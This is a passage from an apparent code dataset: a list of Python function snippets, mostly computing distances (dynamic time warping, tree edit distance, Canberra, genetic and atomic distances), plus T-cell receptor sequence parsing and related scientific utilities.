** config.ring_size_bits)", "def calculate_d3ct(self):\n data = deepcopy(self.ddct)\n data = data.set_index(['cell_line', 'replicate', 'Assay', 'time', 'treatment'])\n control = data.query('treatment == \"Control\"')#.reset_index(drop=True)\n tgfb = data.query('treatment == \"TGFb\"')#.reset_index(drop=True)\n control.index = control.index.droplevel(4)\n tgfb.index = tgfb.index.droplevel(4)\n return tgfb / control", "def convert_tcr(split_line, tcr_id):\n\n # Compile the necessary fields for output\n out_vals = {'sequence_id': tcr_id,\n 'sequence': split_line[params['sequence_index']], 'rev_comp': 'F',\n 'duplicate_count': split_line[params['abundance_index']]}\n\n # If the option has been set, only retain those sequences with a value equal to or greater than that threshold\n if input_args['abundance_filter']:\n if float(out_vals['duplicate_count']) < input_args['abundance_filter']:\n return\n\n # Infer productivity (using presence of CDR3 and Adaptive sequenceStatus value), take junction if there\n if split_line[params['cdr3_index']] and split_line[params['productivity']] == 'In':\n out_vals['junction_aa'] = split_line[params['cdr3_index']]\n out_vals['productive'] = 'T'\n\n # If the option to discard rearrangements lacking proper CDR3 motifs has been set, skip this entry if not C/F\n if input_args['motif_filter']:\n if out_vals['junction_aa'][0] != 'C':\n return\n elif chain == 'TRB' and out_vals['junction_aa'][-1] != 'F':\n return\n # Human TRAJ are a bit more flexible as to their junction-defining residue\n elif chain == 'TRA' and out_vals['junction_aa'][-1] not in ['F', 'W', 'C']:\n return\n\n # If the option to discard rearrangements lacking proper CDR3 motifs has been set, skip this entry if not C/F\n if input_args['junction_len_filter'] != 0:\n if len(out_vals['junction_aa']) < input_args['junction_len_filter']:\n return\n\n else:\n out_vals['junction_aa'] = ''\n out_vals['productive'] = 'F'\n\n # If the option to ignore non-productive rearrangements has been set, skip this row\n if input_args['productivity_filter']:\n return\n\n # If users wanted to they could infer the junction nt sequence, but I haven't, as it's redundant/not very useful\n out_vals['junction'] = ''\n\n # Extract the VDJ genes, fixing their nomenclature and combining together multiple possible calls\n for gene in ['v', 'd', 'j']:\n\n # First take Adaptive's best call\n call = split_line[params[gene + 'MaxResolved']]\n\n # Check whether the code wants to be looking for D genes\n if input_args['no_d'] and gene == 'd':\n sorted_call = ''\n\n # Check whether a gene has been called - if not (and not D) check in the ambiguous gene name ties field\n # NB ambiguous Ds are ignored by default, as there are only two options for TRBD and they're almost identical\n elif not call or call == 'unresolved':\n if gene == 'd' and input_args['no_d_ambiguity']:\n sorted_call = ''\n else:\n sorted_call = resolve_ambiguous_name(split_line, gene)\n\n # If it has full allele accuracy (indicated by an asterisk), tidy it up and take that as the result\n elif call[-3] == '*':\n sorted_call = check_gene(tidy_gene(call))\n\n # Depending on the (hidden) version of the input data, remaining ambiguity might be resolved in 2 places:\n # either in the GeneNameTies or AlleleNameTies fields - need to infer which is correct and deal appropriately\n else:\n\n if bits[params[gene + 'GeneNameTies']]:\n sorted_call = resolve_ambiguous_name(split_line, gene)\n elif bits[params[gene + 'GeneAlleleTies']]:\n sorted_call = resolve_ambiguous_allele(call, split_line, gene)\n\n # However some files are not even covered by that broad formatting, so you just need to allow whatever\n elif input_args['allow_ambiguity']:\n sorted_call = check_gene(tidy_gene(call))\n\n else:\n raise IOError(\"Unknown format on line \" + str(line_count) + \"! Cannot continue. \"\n \"\\n\\tAmbiguity for \" + gene.upper() + \" gene calls lacking allele info that is\"\n \"\\n\\t not resolved in either 'Gene' or 'Allele Ties' fields.\"\n \"\\n\\tTry re-running the script using the '-a' flag (to allow ambiguity),\"\n \"\\n\\t and check that the format of the output document is correct.\")\n\n # If option is selected, remove allele level information\n if input_args['strip_alleles']:\n sorted_call = strip_alleles(poss_alleles, sorted_call)\n\n out_vals[gene + '_call'] = sorted_call\n\n # Finally pad the missing values for the required columns\n for value in [x for x in out_headers if x not in out_vals]:\n out_vals[value] = ''\n\n return out_vals", "def nb_vector_tcrdist(indices, seqs_mat, seqs_L, distance_matrix=tcr_nb_distance_matrix, dist_weight=3, gap_penalty=4, ntrim=3, ctrim=2, fixed_gappos=True):\n\n return _nb_vector_tcrdist(indices, seqs_mat, seqs_L, distance_matrix, dist_weight, gap_penalty, ntrim, ctrim, fixed_gappos)", "def s_dtw(t0, t1):\n n0 = len(t0)\n n1 = len(t1)\n C = np.zeros((n0 + 1, n1 + 1))\n C[1:, 0] = float('inf')\n C[0, 1:] = float('inf')\n for i in np.arange(n0) + 1:\n for j in np.arange(n1) + 1:\n C[i, j] = great_circle_distance(t0[i - 1][0], t0[i - 1][1], t1[j - 1][0], t1[j - 1][1]) + \\\n min(C[i, j - 1], C[i - 1, j - 1], C[i - 1, j])\n dtw = C[n0, n1]\n return dtw", "def tnc(self):\n\n if os.path.isfile(self.scenario_path + \"/output/TNCTrips.csv\"):\n\n # load the output folder tnc trip list\n trips = pd.read_csv(self.scenario_path + \"/output/TNCTrips.csv\",\n usecols=[\"trip_ID\", # unique trip surrogate key\n \"originTaz\", # trip origin TAZ\n \"destinationTaz\", # trip destination TAZ\n \"totalPassengers\"]) # passengers in vehicle excluding driver (0-6)\n\n # append distance and time skims\n # using am peak period hov-2 low value of time\n am_skims = om.open_file(self.scenario_path + \"/output/traffic_skims_AM.omx\")\n\n trips[\"distanceTotal\"] = [\n am_skims[\"AM_HOV2_L_DIST\"][o - 1, d - 1]\n for o, d in zip(trips[\"originTaz\"], trips[\"destinationTaz\"])\n ]\n\n trips[\"timeTotal\"] = [\n am_skims[\"AM_HOV2_L_TIME\"][o - 1, d - 1]\n for o, d in zip(trips[\"originTaz\"], trips[\"destinationTaz\"])\n ]\n\n am_skims.close()\n\n # create person and trip-based weights based on occupancy\n trips[\"passengers\"] = trips[\"totalPassengers\"]\n trips[\"weightPersonTrip\"] = (trips[\"totalPassengers\"] + 1) * 1 / self.sample_rate\n trips[\"weightTrip\"] = 1 * 1 / self.sample_rate\n\n return trips[[\"trip_ID\",\n \"passengers\",\n \"distanceTotal\",\n \"timeTotal\",\n \"weightPersonTrip\",\n \"weightTrip\"]]\n\n else:\n return False", "def dtw(x, y, dist='euclidean'):\n # sanity check\n r, c = len(x), len(y)\n assert r and c, \"the input cannot be empty array\"\n\n if np.ndim(x) == 1:\n x = np.array(x)[:, np.newaxis]\n if np.ndim(y) == 1:\n y = np.array(y)[:, np.newaxis]\n\n # initialization\n step = [(-1, -1), (-1, 0), (0, -1)]\n C = np.zeros((r + 1, c + 1))\n C[:, 0] = C[0, :] = np.inf\n\n # assign cost\n if isinstance(dist, str):\n C[1:, 1:] = cdist(x, y, dist)\n else:\n for i in range(1, r+1):\n for j in range(1, c+1):\n C[i, j] = dist(x[i-1], y[j-1])\n cost = C[1:, 1:].copy()\n\n # DP body\n for i in range(1, r+1):\n for j in range(1, c+1):\n if j == i == 1:\n continue\n C[i, j] += min([C[i+s[0], j+s[1]] for s in step])\n\n dtw_dist = C[-1, -1]/(r+c)\n acc_cost = C[1:, 1:]\n\n # trace back\n path = _traceback(C[1:, 1:], step)\n return dtw_dist, cost, acc_cost, path", "def distanceTo(\n self,\n trgtstn=None,\n instofst=None,\n trgtofst=None,\n refcoef=None,\n ddxyz=False,\n offsettype=None,\n ):\n diff = self.vectorTo(trgtstn, instofst, trgtofst, offsettype=offsettype)\n dist = np.sqrt(np.vdot(diff, diff))\n if not ddxyz:\n return dist\n diff /= dist\n return dist, -diff, diff", "def ccw(p1, p2, p3):\n return (p2[0] - p1[0])*(p3[1] - p1[1]) - (p2[1] - p1[1])*(p3[0] - p1[0])", "def distance(self, t1, t2, costs=unit_costs):\r\n #print costs\r\n #raw_input(\"pause\")\r\n # Cf. Zhang & Shasha:p.1252-1253\r\n #===========================================================================\r\n # Use an embedded function, so T1,T2, l1,l2, and TD are available from the\r\n # name space of the outer function and don't need to be dragged around in\r\n # each function call\r\n # TREEDIST function\r\n #===========================================================================\r\n def edit_dist(i, j):\r\n \"\"\"\r\n compute edit distance between two subtrees rooted in nodes i and j\r\n respectively\r\n \"\"\"\r\n # temporary array for forest distances\r\n FD = ForestDist()\r\n for n in range(l1[i], i+1):\r\n FD[ (l1[i],n), None ] = ( FD[ (l1[i],n-1), None ] + \r\n costs(T1[n], None) ) #NOT SURE ABOUT THE T1[n].label --> TO BE CHECKED\r\n \r\n for m in range(l2[j], j+1):\r\n FD[ None, (l2[j],m) ] = ( FD[ None, (l2[j],m-1) ] + \r\n costs(None, T2[m]) )\r\n \r\n for n in range(l1[i], i+1):\r\n for m in range(l2[j], j+1):\r\n if l1[n] == l1[i] and l2[m] == l2[j]:\r\n FD[ (l1[i],n), (l2[j],m) ] = min(\r\n FD[(l1[i],n-1),(l2[j],m)] + costs(T1[n], None),\r\n FD[(l1[i],n),(l2[j],m-1)] + costs(None, T2[m]),\r\n FD[(l1[i],n-1),(l2[j],m-1)] + costs(T1[n], T2[m]))\r\n \r\n TD[n, m] = FD[ (l1[i],n), (l2[j],m) ]\r\n else:\r\n FD[ (l1[i],n), (l2[j],m) ] = min(\r\n FD[(l1[i],n-1),(l2[j],m)] + costs(T1[n], None),\r\n FD[(l1[i],n),(l2[j],m-1)] + costs(None, T2[m]),\r\n FD[(l1[i],n-1),(l2[j],m-1)] + TD[n,m])\r\n return TD[i,j]\r\n \r\n \r\n #Compute T1[] and T2[]\r\n T1 = self.postorder(t1)\r\n T2 = self.postorder(t2)\r\n \r\n # Compute l()\r\n l1 = self.leftmost_leaf_descendant_indices(T1)\r\n l2 = self.leftmost_leaf_descendant_indices(T2)\r\n \r\n # LR_keyroots1 and LR_keyroots2\r\n kr1 = self.key_root_indices(l1)\r\n kr2 = self.key_root_indices(l2)\r\n \r\n # permanent treedist array\r\n TD = dict()\r\n for i in kr1:\r\n for j in kr2:\r\n edit_dist(i, j)\r\n \r\n #self.print_matrix(T1, T2, TD)\r\n \r\n return TD[i,j]", "def calculate(self, rxn: ComputedReaction) -> float:\n combos = chain(\n product(rxn.reactant_entries, rxn.product_entries),\n combinations(rxn.product_entries, 2),\n )\n distances = [\n self.cpd.shortest_domain_distance(\n combo[0].composition.reduced_formula,\n combo[1].composition.reduced_formula,\n )\n for combo in combos\n ]\n\n distance = self._mu_func(distances)\n return distance", "def get_distances(self, crds):\n self.all_dist = np.zeros((self.natom, self.natom))\n # Loop over upper triangle of atom pairs\n for iat in range(self.natom-1):\n # Get the atom indices\n at_inds = np.arange(len(crds))\n\n # Calc distances between atoms (only upper triangle though)\n at_msk = at_inds > iat\n all_ut_dist = crds[at_msk] - crds[iat]\n all_ut_dist = np.linalg.norm(all_ut_dist, axis=1)\n\n self.all_dist[iat, iat+1:] = all_ut_dist\n\n # Get lower triangle indices\n self.all_dist = self.all_dist + self.all_dist.T", "def edit_distance(self):\n\n edit_dist = 0\n misaligned = False\n\n try:\n with open(self.output_file, 'r') as output_file, open(self.gt_file, 'r') as gt_file:\n\n out_lines = output_file.readlines()\n gt_lines = [g.strip() for g in gt_file.readlines()]\n\n num_symbols = 0\n bd = 0\n # Go through all lines (for polyphony)\n for i in range(len(out_lines)):\n # Skip comparing sequence staff line\n if 'Sequence staff' in gt_lines[i]:\n continue\n\n out_split = out_lines[i].split()\n gt_split = gt_lines[i].split()\n\n #print('Out:',out_split)\n #print('Gt:',gt_split)\n\n num_symbols += len(gt_split) # for calculating symbol error rate\n misaligned = 'misaligned' in out_lines[i] # for ensembling\n\n _a = [symbol for symbol in out_split if symbol != '\\n' and symbol != -1]\n _b = [symbol for symbol in gt_split if symbol != '\\n' and symbol != -1]\n\n ed = self.levenshtein(_a,_b)\n \n # Account for barline at end (don't use when checking CRNN output)\n #if ed == 1 and out_split[-1] == 'barline' and gt_split[-1] != 'barline':\n # ed = 0\n \n edit_dist += ed\n \n staff_num = (i + 1) // 2\n \n if ed == 1:\n pass\n #print(self.output_file)\n #print('Edit dist (staff #%d): %d' % (staff_num, ed))\n \n if _a[-1] == 'barline' and _b[-1] != 'barline' or \\\n _a[-1] != 'barline' and _b[-1] == 'barline':\n #print('Barline diff') \n # print(self.output_file)\n bd = 1\n #print(_a)\n #print(_b)\n \n\n '''\n if len(out_split) != len(gt_split):\n return 0\n\n for j in range(len(out_split)):\n # Treat slur and tie as equivalent\n if out_split[j] != gt_split[j] and\\\n ('slur' not in out_split[j] and 'tie' not in out_split[j]) and\\\n ('slur' not in gt_split[j] and 'tie' not in gt_split[j]):\n return 0\n '''\n except FileNotFoundError:\n print('Missing:',self.output_file, self.gt_file)\n return -1, 1, 0, False\n #print('Found:',self.output_file, self.gt_file)\n return edit_dist, num_symbols, bd, misaligned", "def get_dist(text1, text2, wv):\n t1 = lookup(text1, wv)\n t2 = lookup(text2, wv)\n dist = cos_sim(t1, t2)\n return dist", "def pairwise_correlation_difference(self):\r\n\r\n real_cat, synth_cat = self.to_cat(self.origdst, self.synthdst)\r\n\r\n real_cat_dem = self.get_demographics(real_cat)\r\n synth_cat_dem = self.get_demographics(synth_cat)\r\n\r\n corr_real_obj = associations(real_cat_dem, theil_u=True, bias_correction=False, plot=False)\r\n corr_synth_obj = associations(synth_cat_dem, theil_u=True, bias_correction=False, plot=False)\r\n\r\n corr_real = corr_real_obj['corr']\r\n corr_rand = corr_synth_obj['corr']\r\n\r\n substract_m = np.subtract(corr_real, corr_rand)\r\n prwcrdst = LA.norm(substract_m)\r\n\r\n return prwcrdst, substract_m", "def dist_cost(s_vr, failed_vr, neighbor_vr, dist_matrix, w_a1, w_a2):\n #print s_vr, failed_vr, neighbor_vr\n dist_i_f = dist_matrix[s_vr][failed_vr + 1]\n dist_i_k = dist_matrix[s_vr][neighbor_vr + 1]\n dist = w_a1 * float(dist_i_f) + w_a2 * float(dist_i_k)\n #print \"d_i_f: \", dist_i_f, \", dist_i_k: \", dist_i_k\n return dist", "def distance_between(self, n1, n2):\n if self.distance_method == 'direct':\n n1_relevants = 0\n n2_relevants = 0\n for i in range(len(self.sample)):\n if is_relevant(self.sample.iloc[i], n1.anchor):\n n1_relevants += 1\n if is_relevant(self.sample.iloc[i], n2.anchor):\n n2_relevants += 1\n return (n1_relevants - n2_relevants)/len(self.sample)\n else:\n return 0.5", "def prep_distance(self, t: str = 'float') -> np.ndarray:\n d = np.zeros([self.ic.shape[0]*self.ic.shape[1],\n self.ic.shape[1]*self.ic.shape[0]])\n\n u,v = np.meshgrid(np.arange(self.ic.shape[0]),\n np.arange(self.ic.shape[1]),\n sparse=False, indexing='xy')\n u = u.ravel()\n v = v.ravel()\n z = np.array([u,v]).T\n\n for (k,x) in enumerate(z):\n if not self.boundary:\n d[k,:] = np.array(np.sqrt((u - x[0])**2 + (v - x[1])**2),dtype=t)\n\n else:\n d[k,:] = self.torus(x[0],x[1],\n self.ic.shape[0],\n self.ic.shape[1]\n ).ravel()\n\n return d", "def c_align_split_n(self, tik_instance):\n n_d, d_d, h_d, w_d, _ = self.dst_shape\n dhw_d = d_d * h_d * w_d\n nc_one = self.ub_ele // dhw_d\n c_align = self.c_1 * self.c_0\n n_ub = nc_one // c_align\n\n all_core = _ceil_div(n_d, n_ub)\n ac_num = _set_core_num(all_core)\n\n with tik_instance.for_range(0, ac_num, block_num=ac_num) as num_core:\n ub_ori = tik_instance.Tensor(self.dtype,\n (self.ub_ele,),\n name=\"ub_ori\",\n scope=tik.scope_ubuf)\n ub_trans = tik_instance.Tensor(self.dtype,\n (self.ub_ele,),\n name=\"ub_trans\",\n scope=tik.scope_ubuf)\n\n ub_loop = _set_loop(tik_instance, num_core, ac_num, all_core)\n\n with tik_instance.for_range(0, ub_loop) as num_u:\n core_index = num_u * ac_num + num_core\n\n with tik_instance.if_scope(core_index < all_core - 1):\n n_len = n_ub\n n_before = n_ub * core_index\n args = tik_instance, ub_ori, ub_trans, n_before, n_len\n self.func_c_align_split_n(args)\n\n with tik_instance.else_scope():\n n_before = (all_core - 1) * n_ub\n n_len = n_d - n_before\n args = tik_instance, ub_ori, ub_trans, n_before, n_len\n self.func_c_align_split_n(args)\n\n return tik_instance", "def calc_dist_diff(self, obj1_position, obj2_position, obj3_position):\n if self.prev_obj1_position is None and self.prev_obj2_position is None and self.prev_obj3_position is None:\n self.prev_obj1_position = obj1_position\n self.prev_obj2_position = obj2_position\n self.prev_obj3_position = obj3_position\n\n prev_diff_12 = self.task.calc_distance(self.prev_obj1_position, self.prev_obj2_position)\n current_diff_12 = self.task.calc_distance(obj1_position, obj2_position)\n\n prev_diff_13 = self.task.calc_distance(self.prev_obj1_position, self.prev_obj3_position)\n current_diff_13 = self.task.calc_distance(obj1_position, obj3_position)\n\n prev_diff_23 = self.task.calc_distance(self.prev_obj2_position, self.prev_obj3_position)\n current_diff_23 = self.task.calc_distance(obj2_position, obj3_position)\n \n norm_diff = (prev_diff_13 - current_diff_13) / prev_diff_13 + (prev_diff_23 - current_diff_23) / prev_diff_23 + (prev_diff_12 - current_diff_12) / prev_diff_12\n\n self.prev_obj1_position = obj1_position\n self.prev_obj2_position = obj2_position\n self.prev_obj3_position = obj3_position\n\n return norm_diff", "def euclidean_dist(self):\r\n\r\n real_cat, synth_cat = self.to_cat(self.origdst, self.synthdst)\r\n\r\n real_cat_dem = self.get_demographics(real_cat)\r\n synth_cat_dem = self.get_demographics(synth_cat)\r\n\r\n corr_real_obj = associations(real_cat_dem, theil_u=True, bias_correction=False, plot=False)\r\n corr_synth_obj = associations(synth_cat_dem, theil_u=True, bias_correction=False, plot=False)\r\n\r\n corr_real = corr_real_obj['corr']\r\n corr_rand = corr_synth_obj['corr']\r\n\r\n eucl_matr = distance.cdist(corr_real, corr_rand, 'euclidean')\r\n\r\n eucl = LA.norm(eucl_matr)\r\n\r\n return eucl, eucl_matr", "def distance(self, c1, c2):\n if c1 > c2:\n c1, c2 = c2, c1\n clusterDistance = self.clusterDistanceCache.get((c1,c2), None)\n if clusterDistance is None:\n totalDistance = FeatureComparisonResult() # 0.0\n count = 0\n for b1 in self.c2b[c1]:\n for b2 in self.c2b[c2]:\n totalDistance = totalDistance.add(self._baseDistance(b1, b2))\n count += 1\n if count == 0:\n clusterDistance = FeatureComparisonResult() # 0.0\n else:\n clusterDistance = totalDistance.normalize(count)\n self.clusterDistanceCache[(c1,c2)] = clusterDistance\n return clusterDistance", "def _Conv3DGrad(op, grad):\n strides = op.get_attr('strides')\n padding = op.get_attr('padding')\n data_format = op.get_attr('data_format')\n shape_0, shape_1 = array_ops.shape_n([op.inputs[0], op.inputs[1]])\n dx = nn_ops.conv3d_backprop_input_v2(\n shape_0,\n op.inputs[1],\n grad,\n strides=strides,\n padding=padding,\n data_format=data_format)\n dw = nn_ops.conv3d_backprop_filter_v2(\n op.inputs[0],\n shape_1,\n grad,\n strides=strides,\n padding=padding,\n data_format=data_format)\n dw = 0.5 * (dw + tf.transpose(dw, (0, 1, 2, 4, 3)))\n return dx, dw\n # # Pool grads across symmetric channels\n # dw_t = tf.transpose(\n # dw,\n # (3, 4, 0, 1, 2))\n # dw_symm_t = (0.5) * (dw_t + tf.transpose(\n # dw,\n # (4, 3, 0, 1, 2)))\n # dw_symm = tf.transpose(\n # dw_symm_t,\n # (2, 3, 4, 0, 1))\n # return dx, dw_symm", "def F_calcDMradius(i, t, st, dm, t1, tth):\n mr = st.mn*dm.mxkg_v[i]/(st.mn+dm.mxkg_v[i]) # reduced mass, kg\n # before thermalization (cooling), rx changes with time:\n rxco = np.array([ F_rxco2(tim,t1,mr,(st.nb*1.e+6),dm.sigx_m,st.Rs,dm.mxkg_v[i],pF) for tim in t.time ]) # cm\n print \"-- Radius: rxco at t1 = \",F_rxco2(t1+0.1,t1,mr,(st.nb*1.e+6),dm.sigx_m,st.Rs,dm.mxkg_v[i],pF)\n # after thermalization:\n rxth1 = F_rxth(dm.mx_v[i],st.rhoc,st.Temp) # cm (formula)\n rxth2 = np.interp(tth,t.time,rxco) \t# cm (rxco(tth))\n rxth = rxth1\n print \" rxth=%.2e , rxth1=%.2e , rxth2=%.2e\" % (rxth,rxth1,rxth2)\n for k in xrange(len(t.time)):\n if t.time[k]<t1:\n t.rxtag[k] = 'Rs '\n t.rx[k] = st.Rs*1.e+2\n elif t.time[k]<tth:\n t.rxtag[k] = 'rxco'\n t.rx[k] = rxco[k]\n elif t.time[k]>=tth:\n t.rxtag[k] = 'rxth'\n t.rx[k] = rxth\n return rxco, rxth", "def calc_distances_from_central(cluster, embedding):\n\n return calc_distances_in_embedding(cluster, embedding)", "def canonical_triple(self, c1=0, c2=0):\n if self.q < 3:\n raise ValueError()\n A3 = self.L.generator()\n a3 = self.K.quotient(self.fe.difference_norm(A3, self.L.one()), c1)\n t = self.K.quotient(self.K.product(c2, a3), self.fe.norm(A3))\n return self.canonical_pair(t) + ((A3, a3),)", "def _calc_distance(r1, r2):\n return np.linalg.norm(r1 - r2)", "def add_corridor_constraint(self,seg,r,weight=1.0):\n\n constraint_type = \"cylinder\"\n params = dict()\n params['x1'] = np.array([ self.qr_polytraj.waypoints['x'][0,seg],\n self.qr_polytraj.waypoints['y'][0,seg],\n self.qr_polytraj.waypoints['z'][0,seg]])\n params['x2'] = np.array([ self.qr_polytraj.waypoints['x'][0,seg+1],\n self.qr_polytraj.waypoints['y'][0,seg+1],\n self.qr_polytraj.waypoints['z'][0,seg+1]])\n params['der'] = 0\n params['l'] = r # Give the same radius buffer on the end caps\n params['r'] = r\n params['weight'] = weight\n params['keep_out'] = False\n params['active_seg'] = seg\n\n\n self.qr_polytraj.add_constraint(constraint_type,params,dynamic_weighting=False,sum_func=False)", "def get_cdr3(dcr, headers):\n\n # NB: A productively rearranged receptor does not necessarily mean that it is the working receptor used in a cell!\n out_data = coll.defaultdict()\n for field in headers:\n out_data[field] = ''\n\n out_data['decombinator_id'] = dcr\n out_data['rev_comp'] = 'F'\n\n # CDR3-defining positions\n start_cdr3 = 0\n end_cdr3 = 0\n\n # 1. Rebuild whole nucleotide sequence from Decombinator assignment\n classifier_elements = dcr.split(', ')\n v = int(classifier_elements[0])\n j = int(classifier_elements[1])\n vdel = int(classifier_elements[2])\n jdel = int(classifier_elements[3])\n ins_nt = classifier_elements[4]\n\n # TODO remove 'split' if and when the gene names in the tag files get properly adjusted to be consistent\n out_data['v_call'] = v_names[v].split('*')[0]\n out_data['j_call'] = j_names[j].split('*')[0]\n\n if vdel == 0:\n v_used = v_regions[v]\n else:\n v_used = v_regions[v][:-vdel]\n\n j_used = j_regions[j][jdel:]\n\n out_data['sequence'] = ''.join([v_used, ins_nt, j_used])\n\n # 2. Translate\n out_data['sequence_aa'] = str(Seq(out_data['sequence']).translate())\n\n # 3. Check whether whole rearrangement is in frame\n if (len(out_data['sequence']) - 1) % 3 == 0:\n out_data['productive'] = 'T'\n out_data['vj_in_frame'] = 'T'\n else:\n out_data['productive'] = 'F'\n out_data['vj_in_frame'] = 'F'\n\n # 4. Check for stop codons in the in-frame rearrangements\n if '*' in out_data['sequence_aa']:\n out_data['productive'] = 'F'\n out_data['stop_codon'] = 'T'\n else:\n out_data['stop_codon'] = 'F'\n\n # 5. Check for conserved cysteine in the V gene\n if out_data['sequence_aa'][v_translate_position[v] - 1] == v_translate_residue[v]:\n start_cdr3 = v_translate_position[v] - 1\n out_data['conserved_c'] = 'T'\n else:\n out_data['productive'] = 'F'\n out_data['conserved_c'] = 'F'\n\n # 5.5 Having found conserved cysteine, only need look downstream to find other end of CDR3\n downstream_c = out_data['sequence_aa'][start_cdr3:]\n\n # 6. Check for presence of FGXG motif (or equivalent)\n site = downstream_c[j_translate_position[j]:j_translate_position[j] + 4]\n\n if re.findall(j_translate_residue[j], site):\n end_cdr3 = len(downstream_c) + j_translate_position[j] + start_cdr3 + 1\n out_data['conserved_f'] = 'T'\n else:\n out_data['productive'] = 'F'\n out_data['conserved_f'] = 'F'\n\n if out_data['productive'] == 'T':\n out_data['junction_aa'] = out_data['sequence_aa'][start_cdr3:end_cdr3]\n out_data['junction'] = out_data['sequence'][start_cdr3 * 3:3 * end_cdr3]\n out_data['cdr1_aa'] = v_cdr1[v]\n out_data['cdr2_aa'] = v_cdr2[v]\n\n return out_data", "def distance_matrix_squared(crd1, crd2, dim=2):\n crd1 = ensure_traj(crd1)\n crd2 = ensure_traj(crd2)\n n = int(np.shape(crd1)[1] / dim)\n\n crd1_components = [\n np.tile(np.expand_dims(crd1[:, i::dim], 2), (1, 1, n)) for i in range(dim)\n ]\n crd2_components = [\n np.tile(np.expand_dims(crd2[:, i::dim], 2), (1, 1, n)) for i in range(dim)\n ]\n D2_components = [\n (crd1_components[i] - np.transpose(crd2_components[i], axes=(0, 2, 1))) ** 2\n for i in range(dim)\n ]\n D2 = np.sum(D2_components, axis=0)\n return D2", "def cer(self, s1, s2):\n s1, s2, = s1.replace(' ', ''), s2.replace(' ', '')\n return Lev.distance(s1, s2)", "def coll_trim(th):\n lam = TipLoss(lamInit, th)\n AoA = th - lam / r\n dCL, dCD = PolarLookup(AoA)\n dCT = 0.5 * solDist * (dCL*np.cos(lam/r)-dCD*np.sin(lam/r))* r ** 2\n # dCT = 0.5 * solDist * dCL * r ** 2\n CT = np.trapz(dCT, r)\n\n return CT, dCT, dCL, dCD, lam, AoA", "def _compute_snp_distances(self, task):\n genetic_map = task[\"genetic_map\"]\n temp = task[\"snps\"]\n\n # merge genetic map for this chrom\n temp = pd.concat([temp, genetic_map], ignore_index=False, sort=True)\n\n # sort based on pos\n temp = temp.sort_values(\"pos\")\n\n # fill recombination rates forward\n temp[\"rate\"] = temp[\"rate\"].fillna(method=\"ffill\")\n\n # assume recombination rate of 0 for SNPs upstream of first defined rate\n temp[\"rate\"] = temp[\"rate\"].fillna(0)\n\n # get difference between positions\n pos_diffs = np.ediff1d(temp[\"pos\"])\n\n # compute cMs between each pos based on probabilistic recombination rate\n # https://www.biostars.org/p/123539/\n cMs_match_segment = (temp[\"rate\"] * np.r_[pos_diffs, 0] / 1e6).values\n\n # add back into temp\n temp[\"cMs\"] = np.r_[0, cMs_match_segment][:-1]\n\n temp = temp.reset_index()\n\n # use null `map` values to find locations of SNPs\n snp_indices = temp.loc[temp[\"map\"].isnull()].index\n\n # use SNP indices to determine boundaries over which to sum cMs\n start_snp_ix = snp_indices + 1\n end_snp_ix = np.r_[snp_indices, snp_indices[-1]][1:] + 1\n snp_boundaries = np.c_[start_snp_ix, end_snp_ix]\n\n # sum cMs between SNPs to get total cM distance between SNPs\n # http://stackoverflow.com/a/7471967\n c = np.r_[0, temp[\"cMs\"].cumsum()][snp_boundaries]\n cM_from_prev_snp = c[:, 1] - c[:, 0]\n\n temp = temp.loc[temp[\"map\"].isna()]\n\n # add back into temp\n temp[\"cM_from_prev_snp\"] = np.r_[0, cM_from_prev_snp][:-1]\n\n # restore index\n temp = temp.set_index(\"index\")\n\n return pd.DataFrame(temp[\"cM_from_prev_snp\"])", "def calculateDistance(toPredict, toCompare):\n totalDist = 0\n\n #Calculate the matching score for each attribute\n runtimeDist = matchRuntime(toPredict['runtime'], toCompare['runtime'])\n budgetDist = matchBudget(toPredict['budget'], toCompare['budget_adj'])\n directorDist = matchDirector(toPredict['director'], toCompare['director'])\n genreDist = matchGenres(toPredict['genres'], toCompare['genres'])\n actorDist = matchActors(toPredict['cast'], toCompare['cast'])\n companyDist = matchCompanies(toPredict['production_companies'], toCompare['production_companies'])\n\n #Sum up the individual attribute matching scores time their weights\n totalDist += runtimeDist * RUNTIME_WEIGHT\n totalDist += budgetDist * BUDGET_WEIGHT\n totalDist += directorDist * DIRECTOR_WEIGHT\n totalDist += genreDist * GENRE_WEIGHT\n totalDist += actorDist * ACTOR_WEIGHT\n totalDist += companyDist * COMPANIES_WEIGHT\n\n return totalDist", "def compute_distance(self):\n loc = np.extend_dims(self.state[:, :, Boids.Attr.LOC], axis=-1)\n m = np.tile(loc, (1, 1, self.num_boids))\n pos_diff = m-m.transpose(0, 2, 1)\n self.distance = np.linalg.norm(pos_diff, axis=0)", "def e_dtw(t0, t1):\n\n n0 = len(t0)\n n1 = len(t1)\n C = np.zeros((n0 + 1, n1 + 1))\n C[1:, 0] = float('inf')\n C[0, 1:] = float('inf')\n for i in np.arange(n0) + 1:\n for j in np.arange(n1) + 1:\n C[i, j] = eucl_dist(t0[i - 1], t1[j - 1]) + min(C[i, j - 1], C[i - 1, j - 1], C[i - 1, j])\n dtw = C[n0, n1]\n return dtw", "def distance(cls,config_1, config_2):\n\t\tsorted_data_1 = (config_1.data).sort_values('item')\n\t\tsorted_data_2 = (config_2.data).sort_values('item')\n\t\tdr = sorted_data_1 - sorted_data_2\n\t\treturn np.linalg.norm(dr)", "def dist(pattern, dnas):\n if type(dnas) == str:\n dnas = [dnas]\n\n assert (is_dna(pattern))\n assert (all(is_dna(dna) for dna in dnas))\n\n def dist_to_single_dna(pat, dna_string):\n return min(hamming(pat, kmer) for kmer in get_all_kmers(dna_string, len(pat)))\n\n return sum(dist_to_single_dna(pattern, dna) for dna in dnas)", "def dist_canberra(datamtx, strict=True):\n if strict:\n if not all(isfinite(datamtx)):\n raise ValueError(\"non finite number in input matrix\")\n if any(datamtx<0.0):\n raise ValueError(\"negative value in input matrix\")\n if rank(datamtx) != 2:\n raise ValueError(\"input matrix not 2D\")\n numrows, numcols = shape(datamtx)\n else:\n try:\n numrows, numcols = shape(datamtx)\n except ValueError:\n return zeros((0,0),'d')\n\n oldstate = seterr(invalid='ignore',divide='ignore')\n if numrows == 0 or numcols == 0:\n return zeros((0,0),'d')\n dists = zeros((numrows,numrows),'d')\n for i in range(numrows):\n r1 = datamtx[i]\n for j in range(i):\n r2 = datamtx[j]\n dist = 0.0\n net = abs( r1 - r2 ) / (r1 + r2)\n\n net = nan_to_num(net)\n num_nonzeros = nonzero(net)[0].size\n dists[i,j] = dists[j,i] = nan_to_num(net.sum()/num_nonzeros)\n \n seterr(**oldstate)\n return dists", "def distance_pbc(cls, config_1, config_2):\n\t\tsorted_data_1 = (config_1.data).sort_values('item')\n\t\tsorted_data_2 